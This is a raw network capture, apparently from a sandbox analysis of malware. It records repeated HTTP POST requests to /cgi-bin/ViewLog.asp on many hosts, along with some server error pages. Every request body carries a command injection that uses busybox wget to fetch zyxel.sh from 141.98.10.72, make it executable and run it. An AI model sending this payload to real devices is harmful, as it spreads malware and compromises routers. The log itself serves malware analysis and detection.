                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      307192.168.2.155627894.122.15.88080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.367290974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      308192.168.2.155471694.122.225.238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.369230032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      309192.168.2.155452294.121.137.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.370779037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      310192.168.2.155814031.216.62.458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.398684978 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.674557924 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      311192.168.2.156090895.164.242.2528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.442742109 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.562195063 CET1260INHTTP/1.1 400 Bad Request
                                                      Server: squid/3.5.27
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Length: 3556
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Vary: Accept-Language
                                                      Content-Language: en
                                                      X-Cache: MISS from ubuntu
                                                      X-Cache-Lookup: NONE from ubuntu:8080
                                                      Via: 1.1 ubuntu (squid/3.5.27)
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      312192.168.2.154455631.136.156.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.544382095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:37.210005045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.553956032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.401782036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.777870893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:57.529315948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.824717045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:03.835387945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      313192.168.2.156017062.91.14.268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.554934978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:36.783418894 CET1094INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      Server: TEST
                                                      Date: Wed, 14 Feb 2024 08:29:35 GMT
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 74 69 74 6c 65 3e 5a 69 65 68 65 72 31 37 38 31 41 57 20 2d 20 45 72 72 6f 72 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 6c 6f 67 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 20 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 61 6e 63 6f 6d 2d 73 79 73 74 65 6d 73 2e 64 65 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 69 6d 67 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 70 72 6f 64 75 63 74 73 76 67 2e 73 76 67 22 20 61 6c 74 3d 22 4c 41 4e 43 4f 4d 20 53 79 73 74 65 6d 73 20 48 6f 6d 65 70 61 67 65 22 3e 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 70 22 3e 4c 41 4e 43 4f 4d 20 31 37 38 31 41 57 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 63 6f 6e 74 65 6e 74 20 64 75 6c 6c 45 72 72 6f 72 22 3e 0d 0a 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 59 6f 75 20 61 73 6b 65 64 20 66 6f 72 20 61 20 55 52 4c 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3c 2f 70 3e 0d 0a 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 2f 22 20 3e 0d 0a 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 50 61 67 65 4c 69 6e 6b 22 20 61 63 63 65 73 73 6b 65 79 3d 22 62 22 20 6f 6e 63 6c 69 63 6b 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 27 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 26 71 75 6f 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 26 71 75 6f 74 3b 3e 42 3c 2f 73 70 61 6e 3e 61 63 6b 20 74 6f 20 4d 61 69 6e 2d 50 61 67 65 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"><title>Zieher1781AW - Error - 404</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="/css/login.css"> </head><body ><div class="header"><a href="http://www.lancom-systems.de"><img class="headerimg" src="/images/productsvg.svg" alt="LANCOM Systems Homepage"></a><p class="headerp">LANCOM 1781AW</p></div><div class="logincontent dullError"><h2>404 Not Found</h2><p>You asked for a URL not available on this server</p><form method="POST" action="/" ><div><button type="button" class="mainPageLink" accesskey="b" onclick="document.location.href='/'"><span style=&quot;text-decoration:underline&quot;>B</span>ack to Main-Page</button></div></form> </div> </body></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      314192.168.2.153773694.122.6.1828080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.614855051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      315192.168.2.154501894.123.24.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.616530895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      316192.168.2.154916495.177.164.968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.666150093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
